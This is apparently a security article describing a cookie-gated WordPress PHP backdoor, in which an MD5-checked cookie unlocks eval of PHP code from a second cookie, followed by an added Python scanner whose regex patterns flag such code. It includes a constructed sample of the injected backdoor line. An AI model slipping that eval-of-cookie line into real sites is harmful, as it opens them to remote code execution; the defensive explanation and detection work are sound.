Estimating Cookies To Keep Backdoors Out of Sight
A computer cookie is a small piece of data that a website hands to the browser and that the browser sends back unchanged on later requests. Cookies carry information about a visitor's session on the site and the activity performed during it. A backdoor, by contrast, is code planted to give unauthorized access to a website or its application data without being detected.
Finding a backdoor is rarely a simple task. Its two jobs are to provide unauthorized access and to stay undetected for as long as possible, so backdoors are built with a variety of tricks and tools that make them even harder to detect.
For instance, an attacker can inject a single line of code, possibly fewer than 130 characters, into a file on the site. Small as it looks, that line can be used to load PHP web shells onto the website whenever and however needed, while visitors and administrators notice nothing and never learn that a backdoor is active.
During a recent investigation, a short snippet of injected code was identified. Its operation is simple: the attacker sends a request carrying two cookies, woofig and wp_config. The injected code first checks the request for a cookie named woofig. If that cookie is absent, nothing further is executed. If it is present, the code computes the MD5 hash of its value and compares it with a previously stored hash value; if they do not match, execution stops there as well. Only then does the code look for the second cookie, wp_config, which carries PHP code, and run it with the eval function. Attackers have relatively little room for the PHP code in wp_config, since cookies usually stay under 4096 bytes.
The PHP code carried in the cookie then calls file_get_contents, a built-in PHP function, to fetch data from a given URL. That data contains further PHP code, which is in turn executed with eval. In practice the sequence looks like this: loading the site without the cookies shows a plain WordPress page. The attacker uses browser tools to set the two cookies, woofig and wp_config, and reloads the page, and the PHP web shells are loaded. From there any file on the website can be edited for malicious purposes. Once finished, the attacker clears the cookies and refreshes the page, and the website returns to its normal functioning.
Short snippets of this kind are PHP backdoors and can be readily identified with a server-side scanner. Since WordPress core files normally do not change, one can install a WordPress plugin that scans the core files for modifications.
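As an added example (not code from the original article), a minimal Python server-side scanner that flags the three traits of the snippet described above in PHP source: a cookie value passed to eval, an MD5 gate on a cookie, and eval of content fetched with file_get_contents. The sample PHP files and the HASH_PLACEHOLDER value are constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Traits of the cookie-gated backdoor described in the article: a $_COOKIE
# value passed straight to eval(), an md5() check on a cookie value (the
# "woofig" gate), and eval() of content fetched with file_get_contents().
# PHP function names are case-insensitive, hence re.I.
PATTERNS = {
    "eval_of_cookie": re.compile(r"\beval\s*\(.*\$_COOKIE\b", re.I),
    "md5_gate_on_cookie": re.compile(r"\bmd5\s*\(\s*\$_COOKIE\b", re.I),
    "eval_of_remote_fetch": re.compile(r"\beval\s*\(\s*file_get_contents\s*\(", re.I),
}

@dataclass
class Finding:
    path: str
    line: int
    rule: str
    snippet: str

def scan_source(path: str, source: str) -> list[Finding]:
    """Return one Finding per (line, rule) match in a PHP source string."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(text):
                findings.append(Finding(path, lineno, rule, text.strip()[:120]))
    return findings

def scan_tree(root: str) -> list[Finding]:
    """Scan every .php file under root, e.g. a WordPress document root."""
    findings = []
    for path in Path(root).rglob("*.php"):
        try:
            source = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        findings.extend(scan_source(str(path), source))
    return findings

# Constructed samples: an untouched file and one carrying the injected line.
CLEAN_PHP = "<?php\nrequire __DIR__ . '/wp-load.php';\necho get_bloginfo('name');\n"
INJECTED_PHP = (
    "<?php\n"
    "if (isset($_COOKIE['woofig']) && md5($_COOKIE['woofig']) === 'HASH_PLACEHOLDER')"
    " { eval($_COOKIE['wp_config']); }\n"
    "require __DIR__ . '/wp-load.php';\n"
)
```

Running scan_tree on the WordPress document root lists every file and line that matches; the patterns are plain-text signatures, so variants that hide the function names behind string concatenation or base64 encoding would need additional rules or a file-integrity comparison against known-good core files.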